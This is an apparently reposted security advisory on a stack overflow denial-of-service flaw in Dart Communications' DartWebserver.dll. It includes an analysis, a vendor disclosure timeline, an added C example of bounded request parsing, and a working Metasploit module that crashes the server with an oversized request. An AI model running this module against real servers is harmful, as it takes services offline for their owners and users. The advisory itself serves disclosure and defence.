
Dart Communications Stack Overflow Vulnerability

03 Oct 2012 | Reported by catatonicprime | Type: zdt | Source: 0day.today

Dart Webserver Vulnerability Stack Overflow Exceptio

Overview
===============
DartWebserver.Dll is an HTTP server provided by Dart Communications
(dart.com). It is distributed in their PowerTCP/Webserver For ActiveX
product and likely other similar products.

"Build web applications in any familiar software development
environment. Use WebServer for ActiveX to add web-based access to
traditional compiled applications."

Versions 1.9 and prior are vulnerable to a stack overflow exception,
which may be generated by sending large requests to the application,
e.g. "a" * 5200000 + "\n\n"

Analysis
===============
During the processing of incoming HTTP requests, the server collects
data until it encounters a "\n\n" sentinel. If the request is large,
multiple copies are made and stored on the stack. This quickly consumes
the stack space available to the process and leads to a stack overflow
exception being thrown. The exception is not handled and will typically
lead to the termination of the parent process. Some variation may exist
per system depending on pre-existing memory conditions, and modification
of the Proof of Concept (PoC) code may be necessary to reproduce the
exception.
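
A bounded form of the collect-until-sentinel loop described above, added here as an illustration; it is not Dart's code and not part of the original advisory. The names (hdr_reader, hdr_feed) and the 8192-byte cap are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define MAX_HEADER_BYTES 8192  /* assumed cap, not a value from the advisory */

enum hdr_status { HDR_NEED_MORE, HDR_COMPLETE, HDR_TOO_LARGE };

/* One fixed buffer per connection; allocate it statically or on the heap. */
struct hdr_reader {
    char   buf[MAX_HEADER_BYTES];
    size_t len;
};

void hdr_init(struct hdr_reader *r) { r->len = 0; }

/* Offset just past the first "\n\n" or "\r\n\r\n" in p[0..n), or 0 if absent. */
static size_t find_end(const char *p, size_t n)
{
    for (size_t i = 0; i + 1 < n; i++) {
        if (p[i] == '\n' && p[i + 1] == '\n')
            return i + 2;
        if (i + 3 < n && memcmp(p + i, "\r\n\r\n", 4) == 0)
            return i + 4;
    }
    return 0;
}

/* Append a received chunk. The request is never copied again and never
   grows past the cap, however many bytes the peer sends. */
enum hdr_status hdr_feed(struct hdr_reader *r, const char *chunk, size_t n, size_t *end)
{
    size_t room  = MAX_HEADER_BYTES - r->len;
    size_t take  = n < room ? n : room;
    /* Rescan the last 3 stored bytes so a terminator split across chunks is found. */
    size_t start = r->len >= 3 ? r->len - 3 : 0;

    memcpy(r->buf + r->len, chunk, take);
    r->len += take;

    size_t e = find_end(r->buf + start, r->len - start);
    if (e) {
        *end = start + e;
        return HDR_COMPLETE;
    }
    if (take < n || r->len == MAX_HEADER_BYTES)
        return HDR_TOO_LARGE;   /* caller closes the connection or answers with an error */
    return HDR_NEED_MORE;
}
```

Memory use per connection stays constant at the cap, so a request that never supplies the sentinel is rejected after 8192 bytes instead of being accumulated.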

Timeline
===============
10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they cannot get the
product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the
bug, but replied "there are not immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever ;-)

PoC (MSF Module)
===============
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Dos

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Dart Webserver <= 1.9.0 Stack Overflow',
            'Description'    => %q{
                Dart Webserver from Dart Communications throws a stack overflow exception
                when processing large requests.
            },
            'Author'         => [
                'catatonicprime'
            ],
            'Version'        => '$Revision: 15513 $',
            'License'        => MSF_LICENSE,
            'References'     => [
                [ 'CVE', '2012-3819' ],
            ],
            'DisclosureDate' => '9/28/2012'))

        register_options([
            Opt::RPORT(80),
            OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust', '520000' ])
        ])
    end

    def run
        # Host[:port] string; built here but not used in the request below
        serverIP = datastore['RHOST']
        if (datastore['RPORT'].to_i != 80)
            serverIP += ":" + datastore['RPORT'].to_s
        end
        size = datastore['SIZE']

        print_status("Crashing the server ...")
        # One oversized request followed by the end-of-request sentinel
        request = "A" * size + "\r\n\r\n"
        connect
        sock.put(request)
        disconnect

    end
end



#  0day.today [2018-01-26]  #
